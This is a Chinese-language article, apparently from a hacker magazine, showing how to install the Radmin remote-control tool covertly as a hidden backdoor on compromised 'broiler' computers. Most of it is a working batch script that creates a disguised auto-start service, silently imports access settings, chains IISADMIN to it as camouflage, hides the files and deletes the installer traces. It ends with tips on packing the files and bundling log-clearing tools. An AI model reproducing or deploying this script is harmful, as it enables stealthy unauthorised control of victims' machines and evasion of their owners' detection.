适合读者:黑器爱好者、入侵爱好者
前置知识:基本DOS命令
SC+BAT携手打造完美个人版Radmin
文/ 亦缘
R-admin是一个优秀的远程控制软件, 很多朋友都非常喜欢它, 所以想尽办法让它隐藏自己的踪迹, 以达到更好的控制肉鸡的功效, 最近经常玩这个, 偶然之间有所心得, 不敢独享, 特撰文与大家共享。
我们都知道R-admin的服务是通过“R_server.exe /install”这个命令来安装的, 服务名为“R_server”, 显示名称为“Remote Administrator Service”, 没有描述。 一键R-admin替换服务的原理就是删掉了系统不常用且对系统运行并无较大影响的服务后取而代之。 首先将R_server.exe更名并取代原服务(即被删掉的系统服务)所运行的exe进程文件, 再将所需的“AdmDll.dll”和“raddrv.dll”也复制进同目录内。 这里要注意的是需要导入的注册表有两个, 一个是含有端口、密码等注册表信息的文件, 即注册表项 HKEY_LOCAL_MACHINE\SYSTEM\R-admin, 另一个就是服务的注册表文件了, 所以必须得先在自己的电脑上安装一次R_server, 再导出注册表项 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\R_server里的内容, 并修改里面的服务名称, 描述等等信息。 但是不知道这样做的人有没有想过, 导入的这个服务只能应用于与你的操作系统一样的电脑上(还得包括系统盘在内), 因为你基本上没法修改进程文件在注册表里的路径“ImagePath”, 所以个人觉得, 替换服务又麻烦又不方便, 不可取。
换一个角度想, 有没有办法不安装R_server在本鸡也能实现远程安装的呢?也就是说, 就象灰鸽子一样, 我们能不能自定义服务名、描述和路径来自启动“R_server.exe”, 让它直接来取代R_server服务呢?理论上的回答与实践后的答案都是肯定的。 接下来就得看“SC.exe”的了。 SC是一款非常强大的服务管理程序, 它和Net.exe在用法上有着相似的地方, 在XP和2003是自带SC.exe的, 大家可以试一下在CMD下输入SC回车后, 会出现很多有关与服务相关的内容, 这也就是SC的强大功能介绍了。
下边就是我用SC和BAT的联合起来编的一段代码, 可以完全取代R_server服务, 做到真正完美的个人版R-admin:
——————CODE START——————
@echo off
@REM 隐藏执行步骤
@sc stop R_server
@REM 停止“R_server”服务(防止此电脑上已经有人装过R-admin)
@sc delete R_server
@REM 删除“R_server”服务
@regedit /s R-admin.reg
@REM 以隐藏方式导入配置好的R-admin端口, 密码等注册表信息。
@sc create NEWservice binpath= "%systemroot%\system32\XXX.exe /service" type= own type= interact start= auto
@REM 在本地计算机上, 建立一个自动运行的“NEWservice”服务, 运行在“XXX.exe”的独立进程上, 并允许此服务与桌面交互(R-admin桌面控制的一个重要因素)。
@sc config NEWservice DisplayName= NEWservice123
@REM 配置“NEWservice”服务的显示名称为“NEWservice123”。
@sc description NEWservice NEWservice456
@REM 更改“NEWservice”服务的描述为“NEWservice456”。
@sc config IISADMIN depend= NEWservice
@REM 让“IISADMIN(IIS Admin Service)”服务依存于“NEWservice”服务, :这样做一来为保险, 二来还可以以假乱真。
@attrib +h +r XXX.exe
@attrib +h +r AdmDll.dll
@attrib +h +r raddrv.dll
@REM 分别给以上三个文件加上隐藏和只读属性。
@sc start NEWservice
@REM 开始“NEWservice”服务。
@del R-admin.reg
@del sc.exe
@del 自解压包.exe
@REM 这里就不需要解释了吧?
——————CODE END——————
蝴蝶:上面的“XXX.exe”为原R-admin目录里的“R_server.exe”文件, 可随意更名;可以将以上“@REM 文字”之类的解释语去掉, 不去掉也不会显示在DOS执行窗口里边;“%SystemDrive%\”代表系统盘, “%SystemRoot%\System32”代表系统盘下Windows\winnt目录下的System32目录, “%SystemRoot%\”代表系统盘Windows或Winnt目录。
这样做出来的服务端如果运行在Windows NT/XP/2003上就是比较完美的了, 如果安装在Windows 9X上, 大家也可以试着从注册表启动(建议最好做个Windows 9X专用的服务端, 免得服务端没被发现, 却在注册表启动项里发现了, 偷鸡不成蚀把米)。 建议大家不要把压缩包做得太大, 500K以上的话就没必要了, 尽量的给一些EXE和DLL文件加上压缩壳, 可以在压缩包里加入一些其它的小工具, 比如清除日志之类的等等, 看大家怎么样去灵活运用了。
……